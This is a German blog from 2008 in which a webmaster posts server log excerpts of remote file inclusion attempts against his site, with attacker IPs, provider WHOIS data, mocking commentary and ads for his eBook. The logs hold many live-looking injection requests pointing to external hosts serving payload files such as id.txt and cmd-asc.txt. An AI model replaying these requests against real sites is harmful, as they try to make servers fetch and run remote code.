Hackerreport's Weblog

Ankündigung

hackerreports — Wed, 16 Jul 2008 06:34:34 +0000

Hallo liebe Leser,

seit der Ankündigung vom 31. März 2008:

„P.S… ein Gruss an die Amateure, die Angriffe, die nun auf den Shop folgen, erscheinen dann in der zweiten eBook-Ausgabe 02/2008.“

haben die Amateure wohl Muffensaussen bekommen, die amateurhaften Versuche hörten abrupt auf, wie schön man doch die Naivität dieser Kindsköpfe steuern kann.

Somit kommt der neue Report, sehr detailliert, erst raus, wenn ich neuen und interessanten Stoff zu bieten habe.

Viele Grüsse

Der Webmaster

Die erste Ausgabe – Hacker Reports 2008

hackerreports — Sat, 14 Jun 2008 07:12:39 +0000

Hallo liebe Leser,

das neue eBook Hacker Reports 01/2008 ist seit März verfügbar.

Sichern Sie sich dieses Exemplar, das nur der erste Teil einer neuen Serie ist, die nun jedes Quartal erscheint.

Hier geht es zum Shop:

Viele Grüsse

Der Webmaster

Einführungspreis… nur für den Mai

hackerreports — Tue, 06 May 2008 06:10:00 +0000

Hallo liebe Leser,

das neue eBook Hacker Reports 01/2008 gibt es nun, nur im Mai zum Einführungspreis.

Sichern Sie sich dieses Exemplar, das nur der erste Teil einer neuen Serie ist, die nun jedes Quartal erscheint.

Hier geht es zum Shop:

Viele Grüsse

Der Webmaster

Wie geht es weiter?

hackerreports — Mon, 31 Mar 2008 10:44:00 +0000

Hallo liebe Leser,

es folgt in Kürze eine sehr interessante eBook-Serie, auf die kein Webmaster verzichten sollte.

Die Serie beinhaltet z. B. Beispiele, wie Sie selber auf einfachen Wege eine Protokollierung auf Ihre Website bringen können, gefolgt von weiteren Beispielen, wie z. B. eine fertige .htaccess, die dann bestimmte Netzwerke sperrt, auf die man eh verzichten kann.

Natürlich als Add-On, werden in diesem eBook die Dümmsten unter den Hackern detailliert mit Datum, Uhrzeit und IP geoutet.

Mit den detaillierten Protokollauszügen wird Ihnen gezeigt, wie Sie diese Hacking-Angriffe erkennen und viele davon auch abwehren können.

Wie sieht es mit Ihrem Portal aus, egal ob Forum, Shop oder Homepage? Wie sicher ist Ihr Portal?

Diese und viele weitere Fragen werden in der eBook-Serie beantwortet.

Verpassen Sie nicht den Starttermin der ersten Ausgabe am 05.04.08.

Einfach ein absolutes MUSS für jeden Webmaster!

WWW.eBooks-fuer-alle.info

Viele Grüsse

Der Webmaster

P.S… ein Gruss an die Amateure, die Angriffe, die nun auf den Shop folgen, erscheinen dann in der zweiten eBook-Ausgabe 02/2008.

Angriff am 18.03.08

hackerreports — Sat, 29 Mar 2008 15:45:00 +0000

Am 18.03.08 ging es dann weiter, die Amateure versuchten weiterhin erfolglos, mein Portal zu hacken.

Auch diesmal versuchten es einer über eine bekannte Sicherheitslücke eines PHP-Scripts (php121), naja, man hat ja mal was von gehört. Meine Meinung ist, diese Amateure starten irgendein Tool aber haben gar keine Ahnung, was sie da eigentlich tun, denn den Button eines Hackertools kann ja jeder Idiot drücken.

Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!

Der erste Versuch am 18.03.08

Der Amateur, der hier mittels seiner IP 222.255.3.68 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 222.255.0.0 – 222.255.3.255
netname: VDC-NET
country: vn
descr: VietNam Data Communication Company

Hier das Protokoll:

18.03.08, 16:58:05, 222.255.3.68, /index.php?page=services/osData/php121/php121db.php?
php121dir=http://www.cdpm3.com/id.txt?

Der zweite Versuch am 18.03.08

Der Amateur, der hier mittels seiner IP 88.191.26.64 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 88.191.3.0 – 88.191.248.255
netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Customers
descr: Paris, France

Hier das Protokoll, der hat sich ja richtig Mühe gegeben aber das tut ein blindes Huhn ja auch:

18.03.08, 21:34:20, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.agv-schaafheim.de%2F
gallery%2Fdata%2Fmedia%2Fnexa%2Fzevela%2F
18.03.08, 21:34:22, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b
%2Fpages%2Fgodot%2Feridehi%2F
18.03.08, 21:34:23, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.polisgrandhotel.gr%2F
_cm_admin%2Fmaillist%2Feditor%2Fplugins%2Fcore%2Fdialogs%2Fqunik%2Futanac%2F
18.03.08, 21:34:35, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
fabcraft.co.uk%2Fforum%2Fugak%2Fmiketat%2F
18.03.08, 21:34:36, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
tcmforum.com%2Fweb%2Fsal%2Fyuveli%2F
18.03.08, 21:34:37, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
clubnataciotortosa.com%2FUserFiles%2FFile%2Fedut%2Fjezin%2F
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=articles
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fsites.
redskycreative.com%2Fcanyonlakechurch%2Fjolalu%2Fbuq%2F
18.03.08, 21:34:40, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
soeasywebsite.com%2Fsoeasycasino%2Fenosucu%2Fijani%2F
18.03.08, 21:34:41, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fotitob%2F
18.03.08, 21:34:42, 88.191.26.64, /index.php?page=privacy
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=http%3A%2F%2Fctot.ru%2Fsts%2Fst22.files%2Fcusipu
%2Fhidola%2Fapa%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.planet-
pictures.de%2Fcontent_system%2Fola%2Fitil%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fhonamfishing.co.kr
%2Fphpmysqladmin%2Flibraries%2Fnov%2Fwulosu%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.marsbook.co.kr
%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fohalupa%2F
18.03.08, 21:34:47, 88.191.26.64, /index.php?page=terms_of_use
18.03.08, 21:34:48, 88.191.26.64, /index.php?page=showarticle&articleid=1
18.03.08, 21:34:48, 88.191.26.64, /?orderby=gender&sortorder=asc
18.03.08, 21:34:49, 88.191.26.64, /?orderby=sincedate&sortorder=asc

Der dritte Versuch am 18.03.08

Der Amateur, der hier mittels seiner IP 209.62.86.4 seine Spur hinterlies, kam über folgenden Provider:

OrgName: ThePlanet.com Internet Services, Inc.
OrgID: TPCM
Address: 315 Capitol
Address: Suite 205
City: Houston
NetRange: 209.62.0.0 – 209.62.127.255

Hier das Protokoll, frei nach dem Motto „und mühsam ernährt sich das Eichörnchen“:

18.03.08, 22:27:03, 209.62.86.4, /index.php?page=http%3A%2F%2F
www.sanyoclim.fr%2Fextension%2Fezodf%2Fedidu%2Feyep%2F
18.03.08, 22:27:05, 209.62.86.4, /index.php?page=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2F
pic%2Fhuv%2Fabey%2F
18.03.08, 22:27:06, 209.62.86.4, /index.php?page=http%3A%2F%2Fwww.zetesis.biz%2FLMR%2Fade
%2Fzupe%2F
18.03.08, 22:27:08, 209.62.86.4, /index.php?page=shownews&newsid=
http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fenosucu
%2Fijani%2F
18.03.08, 22:27:10, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.blankner
.ocps.net%2Fmedia%2Fimages%2Fefepi%2Fasopuy%2F
18.03.08, 22:27:11, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fchyngachanga
.ru%2Fcontent%2Fwuge%2Fasagula%2F
18.03.08, 22:27:16, 209.62.86.4, /index.php?page=login
18.03.08, 22:27:18, 209.62.86.4, /index.php?page=shownews&newsid=6
18.03.08, 22:27:23, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2F
MType%2Farchives%2Fajuq%2Fpiy%2F&sortorder=asc
18.03.08, 22:27:25, 209.62.86.4, /?orderby=http%3A%2F%2Fsites.redskycreative.com%2Fcanyonlakechurch
%2Fjolalu%2Fbuq%2F&sortorder=asc
18.03.08, 22:27:26, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.snowmobile.ro%2Fphoto%2Fproduct%2F
_ugohoj%2Ferisa%2Fodiy%2Fwifefef%2F&sortorder=asc
18.03.08, 22:27:28, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.municipioxii.it%2F
sunnyway%2Figodoq%2Fbukosud%2F
18.03.08, 22:27:30, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.antwerpsupporter
.be%2Fsubscribe_2_me_to-delete%2Fsm%2Fexported_files1%2
Fmosupoz%2Fadusa%2Fojafujo%2Faweji%2F
18.03.08, 22:27:31, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.lamarguerite.ca%2F
Pat%2Fimages%2Fawixeta%2Fveb%2F
18.03.08, 22:27:33, 209.62.86.4, /index.php?page=terms_of_use
18.03.08, 22:27:42, 209.62.86.4, /?orderby=city&sortorder=asc
18.03.08, 22:27:44, 209.62.86.4, /?orderby=country&sortorder=asc

Auch für diesen Tag gilt, planloses Starten von irgendwelchen Tools, wo diese Dilettanten gar nicht so recht wissen, was sie da eigentlich tun. Schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster

Angriff am 17.03.08

hackerreports — Sat, 29 Mar 2008 14:58:00 +0000

Am 17.03.08 kamen dann die nächsten Idioten (Hacker) mit ihren amateurhaften Angriffsversuchen.

Diesmal versuchten Sie es über eine bekannte Sicherheitslücke eines PHP-Scripts (php121), naja, man hat ja mal was von gehört. Meine Meinung ist, diese Amateure starten irgendein Tool aber haben gar keine Ahnung, was sie da eigentlich tun, denn den Button eines Hackertools kann ja jeder Idiot drücken.

Der erste Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 165.138.51.197 seine Spur hinterlies, kam über folgenden Provider:

OrgName: Indiana Department of Education
OrgID: IDE-10
Address: Room 229
Address: State House
City: Indianapolis
NetRange: 165.138.0.0 – 165.138.255.255

Hier das Protokoll:

17.03.08, 15:49:32, 165.138.51.197, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://nkdb.org//AsaMall/makeup/id.txt??
17.03.08, 15:49:34, 165.138.51.197, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://revelation-divine.net/backup/id.txt??

Der zweite Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 202.181.99.83 seine Spur hinterlies, kam über folgenden Provider:

inetnum:      202.181.96.0 - 202.181.111.255netname:      SAKURAdescr:        SAKURA Internet Inc.descr:        1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japancountry:      JP

Hier das Protokoll:

17.03.08, 16:34:43, 202.181.99.83,
/index.php?page=services//osData/php121/php121db.php?
php121dir=http://contactcraze.com/cmd-asc.txt??

Der dritte Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 86.197.68.38 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 86.197.68.0 – 86.197.68.255
address: FRANCE TELECOM/SCR
netname: IP2000-ADSL-BAS
descr: BSNIC152 Nice Bloc 1
country: FR

Hier das Protokoll:

17.03.08, 19:08:44, 86.197.68.38, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://www.germ2.com/www/z.txt???

Auch hier hat dieser Amateure keinen Schaden angerichtet, jedoch, schon der Versuch ist strafbar! Über so viel Dummheit, kann man echt nur grinsen.

Viele Grüsse

Der Webmaster

Angriff am 04.03.08

hackerreports — Sat, 29 Mar 2008 14:32:00 +0000

Am 04.03.08 kam dann er nächsten Hacker mit einem amateurhaften Angriffsversuch.

Der Versuch am 04.03.08

Der Amateur, der hier mittels seiner IP 67.15.191.24 seine Spur hinterlies, kam über folgenden Provider:

OrgName:    ThePlanet.com Internet Services, Inc. OrgID:      TPCMAddress:    315 CapitolAddress:    Suite 205City:       HoustonStateProv:  TXNetRange:   67.15.0.0 - 67.15.255.255

Hier das Protokoll:

04-03-08 / 10:47:05 – 67.15.191.24 – /
04-03-08 / 10:47:07 – 67.15.191.24 – /index.php?page=http%3A%2F%2Fwww.northfans.ch%2Fforum%2F
admin%2Fsettings%2Fgucor%2Fujusu%2F
04-03-08 / 10:47:08 – 67.15.191.24 – /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
04-03-08 / 10:47:09 – 67.15.191.24 – /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2F
forums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
04-03-08 / 10:47:13 – 67.15.191.24 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
04-03-08 / 10:47:14 – 67.15.191.24 – /index.php?page=shownews&newsid=http%3A%2F%2Fsahel55.com%2F
articles%2Fomaduro%2Fkimumid%2F
04-03-08 / 10:47:15 – 67.15.191.24 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.electrofed
.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F
04-03-08 / 10:47:18 – 67.15.191.24 – /index.php?page=allnews
04-03-08 / 10:47:21 – 67.15.191.24 – /index.php?page=faq
04-03-08 / 10:47:22 – 67.15.191.24 – /index.php?page=login
04-03-08 / 10:47:24 – 67.15.191.24 – /?orderby=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin
%2Fsettings%2Fgucor%2Fujusu%2F&sortorder=asc
04-03-08 / 10:47:25 – 67.15.191.24 – /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap
%2Fehudute%2F&sortorder=asc
04-03-08 / 10:47:26 – 67.15.191.24 – /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap
%2Fehudute%2F&sortorder=asc
04-03-08 / 10:47:27 – 67.15.191.24 – /?orderby=city&sortorder=http%3A%2F%2Fsahel55.com%2Farticles
%2Fomaduro%2Fkimumid%2F
04-03-08 / 10:47:28 – 67.15.191.24 – /?orderby=city&sortorder=http%3A%2F%2Fwww.obrasmecanicasch
.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
04-03-08 / 10:47:29 – 67.15.191.24 – /?orderby=city&sortorder=http%3A%2F%2Fwww.elettrodataservice.it
%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
04-03-08 / 10:47:31 – 67.15.191.24 – /index.php?page=services
04-03-08 / 10:47:32 – 67.15.191.24 – /index.php?page=privacy
04-03-08 / 10:47:36 – 67.15.191.24 – /?orderby=city&sortorder=asc
04-03-08 / 10:47:37 – 67.15.191.24 – /?orderby=gender&sortorder=asc

Auch hier hat dieser Amateure keinen Schaden angerichtet, jedoch, schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster

Hier finden Sie Infos, über die dümmsten Hacker.

hackerreports — Sat, 29 Mar 2008 14:29:34 +0000

allo liebe Leser,

es folgt in Kürze eine sehr interessante eBook-Serie, auf die kein Webmaster verzichten sollte.

Natürlich als Add-On, werden in diesem eBook die Dümmsten unter den Hackern detailliert mit Datum, Uhrzeit und IP geoutet.

Mit den detaillierten Protokollauszügen wird Ihnen gezeigt, wie Sie diese Hacking-Angriffe erkennen und viele davon auch abwehren können.

Wie sieht es mit Ihrem Portal aus, egal ob Forum, Shop oder Homepage? Wie sicher ist Ihr Portal?

Diese und viele weitere Fragen werden in der eBook-Serie beantwortet.

Verpassen Sie nicht den Starttermin der ersten Ausgabe am 05.04.08.

Einfach ein absolutes MUSS für jeden Webmaster!

WWW.eBooks-fuer-alle.info

Weiterer Infos sind auch hier zu finden:

Hackers Reports

Viele Grüsse

Der Webmaster

P.S… ein Gruss an die Amateure, die Angriffe, die nun auf den Shop folgen, erscheinen dann in der zweiten eBook-Ausgabe 02/2008. )

Angriff am 03.03.08

hackerreports — Sat, 29 Mar 2008 14:16:00 +0000

Am 03.03.08 ging es dann munter weiter, mit den amateurhaften Angriffsversuchen.

Der erste Versuch am 03.03.08

Der Amateur, der hier mittels seiner IP 213.232.89.31 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 213.232.89.0 – 213.232.89.255
netname: GNX-NETWORK
descr: GNX Network Ltd. Second Allocation
country: GB
address: London

Hier das Protokoll:

03-03-08 / 16:09:54 – 213.232.89.31 – /
03-03-08 / 16:09:55 – 213.232.89.31 – /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 16:09:57 – 213.232.89.31 – /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2F
forums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
03-03-08 / 16:09:58 – 213.232.89.31 – /index.php?page=http%3A%2F%2Fwww.northfans.ch%2Fforum%2F
admin%2Fsettings%
2Fgucor%2Fujusu%2F
03-03-08 / 16:10:03 – 213.232.89.31 – /index.php?page=shownews&newsid=http%3A%2F%2Fsans-packing.
ru%2Fimg%2Fjipeqap%2Fehudute%2F
03-03-08 / 16:10:04 – 213.232.89.31 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtorr
esycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 16:10:05 – 213.232.89.31 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.municipi
oxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F
03-03-08 / 16:10:09 – 213.232.89.31 – /index.php?page=allnews
03-03-08 / 16:10:11 – 213.232.89.31 – /index.php?page=privacy
03-03-08 / 16:10:13 – 213.232.89.31 – /index.php
03-03-08 / 16:10:14 – 213.232.89.31 – /index.php?page=articles
03-03-08 / 16:10:16 – 213.232.89.31 – /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.altaiseer
-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F
03-03-08 / 16:10:20 – 213.232.89.31 – /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.northfans
.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
03-03-08 / 16:10:22 – 213.232.89.31 – /index.php?page=showarticle&articleid=http%3A%2F%2Fsahel55.com%2F
articles%2Fomaduro%2Fkimumid%2F
03-03-08 / 16:10:29 – 213.232.89.31 – /index.php?page=shownews&newsid=3
03-03-08 / 16:10:30 – 213.232.89.31 – /index.php?page=faq
03-03-08 / 16:10:31 – 213.232.89.31 – /index.php?page=showarticle&articleid=1

Am gleichen Tag folgte dann ein zweiter Angriff.

Der Amateur, der hier mittels seiner IP 81.25.195.225 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 81.25.195.224 – 81.25.195.239
netname: ITEMA-NET
descr: ITEMA
descr: Paris
country: FR

Hier das Protokoll:

03-03-08 / 17:13:31 – 81.25.195.225 – /
03-03-08 / 17:13:33 – 81.25.195.225 – /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2F
imagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F
03-03-08 / 17:13:35 – 81.25.195.225 – /index.php?page=http%3A%2F%2Fwww.altaiseer-eg.com%2Far%2F
articles%2Fjed%2Fumut%2F
03-03-08 / 17:13:39 – 81.25.195.225 – /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 17:13:49 – 81.25.195.225 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.cjp.spb
.ru%2Fen%2Ftis%2Fleboma%2F
03-03-08 / 17:13:50 – 81.25.195.225 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.electro
fed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F
03-03-08 / 17:13:51 – 81.25.195.225 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtor
resycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 17:13:53 – 81.25.195.225 – /?orderby=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin
%2Flibraries%2Foduzov%2Fneloze%2F&sortorder=asc
03-03-08 / 17:13:54 – 81.25.195.225 – /?orderby=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes
%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&sortorder=asc
03-03-08 / 17:13:55 – 81.25.195.225 – /?orderby=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin
%2Flibraries%2Foduzov%2Fneloze%2F&sortorder=asc
03-03-08 / 17:13:56 – 81.25.195.225 – /?orderby=age&sortorder=http%3A%2F%2Fwww.municipioxii.it%2F
sunnyway%2Feheqebi%2Fjahibop%2F
03-03-08 / 17:13:57 – 81.25.195.225 – /?orderby=age&sortorder=http%3A%2F%2Fwww.obrasmecanicasch
.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 17:13:58 – 81.25.195.225 – /?orderby=age&sortorder=http%3A%2F%2Fwww.electrofed.com%2F
_app%2Fefc%2Fodoqu%2Fferus%2F
03-03-08 / 17:13:58 – 81.25.195.225 – /index.php?page=privacy
03-03-08 / 17:13:59 – 81.25.195.225 – /index.php?page=faq
03-03-08 / 17:14:02 – 81.25.195.225 – /index.php
03-03-08 / 17:14:03 – 81.25.195.225 – /index.php?page=allnews
03-03-08 / 17:14:04 – 81.25.195.225 – /index.php?page=terms_of_use
03-03-08 / 17:14:06 – 81.25.195.225 – /?orderby=age&sortorder=asc

Alle Guten Dinge sind drei, hier der dritte Idiot.

Der Amateur, der hier mittels seiner IP 83.246.95.76 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 83.246.94.0 – 83.246.95.255
netname: SERVERPOOL-VPS1-NET
descr: VPS Serverpool
descr: Hannover, Germany
country: DE

Hier das Protokoll:

03-03-08 / 20:44:21 – 83.246.95.76 – /
03-03-08 / 20:44:24 – 83.246.95.76 – /index.php?page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2F
pages%2Filosi%2Fdohigal%2F
03-03-08 / 20:44:25 – 83.246.95.76 – /index.php?page=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch
%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 20:44:25 – 83.246.95.76 – /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2F
correo%2Fenaq%2Fecib%2F
03-03-08 / 20:44:29 – 83.246.95.76 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.elettrodata
service.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
03-03-08 / 20:44:30 – 83.246.95.76 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.obrasmecani
casch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 20:44:31 – 83.246.95.76 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.elettrodata
service.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
03-03-08 / 20:44:32 – 83.246.95.76 – /index.php?page=faq
03-03-08 / 20:44:33 – 83.246.95.76 – /index.php?page=allnews
03-03-08 / 20:44:34 – 83.246.95.76 – /index.php?page=services
03-03-08 / 20:44:36 – 83.246.95.76 – /index.php?page=articles
03-03-08 / 20:44:37 – 83.246.95.76 – /index.php?page=showarticle&articleid=http%3A%2F%2Fsahel55.com
%2Farticles%2Fomaduro%2Fkimumid%2F
03-03-08 / 20:44:38 – 83.246.95.76 – /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.psikoloji
kyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F
03-03-08 / 20:44:38 – 83.246.95.76 – /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.altaiseer
-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F
03-03-08 / 20:44:42 – 83.246.95.76 – /index.php?page=showarticle&articleid=1

Auch hier hat keiner der Amateure Schaden angerichtet, jedoch, schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster

Der erste Angriff am 02.03.08

hackerreports — Sat, 29 Mar 2008 14:14:00 +0000

Der erste Versuch, am 02.03.08 fingen die Hacking-Angriffe auf eines meiner Portale an.

Der Amateur, der hier mittels seiner IP 209.23.126.65 seine Spur hinterlies, kam über folgenden Provider:

OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US
NetRange: 209.23.0.0 – 209.23.127.255

Hier das Protokoll:

02-03-08 / 20:23:33 – 209.23.126.65 – /index.php?page=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2
F&newsid=3
02-03-08 / 20:23:36 – 209.23.126.65 – /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2
FsubSilver%2Fimages%2Fuza%2Flaqipu%2F&newsid=3
02-03-08 / 20:23:37 – 209.23.126.65 – /index.php?page=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2F
ferus%2F&newsid=3
02-03-08 / 20:23:38 – 209.23.126.65 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%
2Fpages%2Filosi%2Fdohigal%2F
02-03-08 / 20:23:40 – 209.23.126.65 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforu
ms%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
02-03-08 / 20:23:41 – 209.23.126.65 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2F
leboma%2F
02-03-08 / 20:23:56 – 209.23.126.65 – /index.php?page=shownews&newsid=3
02-03-08 / 20:23:57 – 209.23.126.65 – /index.php
02-03-08 / 20:24:00 – 209.23.126.65 – /?orderby=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%
2F&sortorder=asc
02-03-08 / 20:24:01 – 209.23.126.65 – /?orderby=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2
F&sortorder=asc
02-03-08 / 20:24:02 – 209.23.126.65 – /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F&sortor
der=asc
02-03-08 / 20:24:02 – 209.23.126.65 – /?orderby=country&sortorder=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_artic
oli%2Fonoda%2Fiyegimi%2F
02-03-08 / 20:24:04 – 209.23.126.65 – /?orderby=country&sortorder=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Flebom
a%2F

Am gleichen Tag folgte dann ein zweiter Angriff.

Der Amateur, der hier mittels seiner IP 72.232.44.170 seine Spur hinterlies, kam über folgenden Provider:

OrgName: Layered Technologies, Inc.
OrgID: LAYER-3
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US
NetRange: 72.232.0.0 – 72.233.127.255

02-03-08 / 21:11:30 – 72.232.44.170 – /
02-03-08 / 21:11:33 – 72.232.44.170 – /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicac
iones%2Ffotos%2Fnepicu%2Fegul%2F
02-03-08 / 21:11:34 – 72.232.44.170 – /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicac
iones%2Ffotos%2Fnepicu%2Fegul%2F
02-03-08 / 21:11:36 – 72.232.44.170 – /index.php?page=http%3A%2F%2Fwww.interkonet.com%2Fenxicmarxant%2Fweb%2Fe
ditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F
02-03-08 / 21:11:47 – 72.232.44.170 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtorresycia.com%2Fadm
in%2Fcorreo%2Fenaq%2Fecib%2F
02-03-08 / 21:11:51 – 72.232.44.170 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.heaven-house.kz%2Ftempl
ates_c%2Fsexes%2Fafacub%2F
02-03-08 / 21:11:52 – 72.232.44.170 – /index.php?page=shownews&newsid=http%3A%2F%2Fwww.interkonet.com%2Fenxicma
rxant%2Fweb%2Feditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F
02-03-08 / 21:11:57 – 72.232.44.170 – /index.php?page=articles
02-03-08 / 21:12:02 – 72.232.44.170 – /index.php?page=showarticle&articleid=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmy
sqladmin%2Flibraries%2Foduzov%2Fneloze%2F
02-03-08 / 21:12:04 – 72.232.44.170 – /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.elettrodataservice.it%2F
foto_articoli%2Fonoda%2Fiyegimi%2F
02-03-08 / 21:12:06 – 72.232.44.170 – /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.psikolojikyardim.org%2F
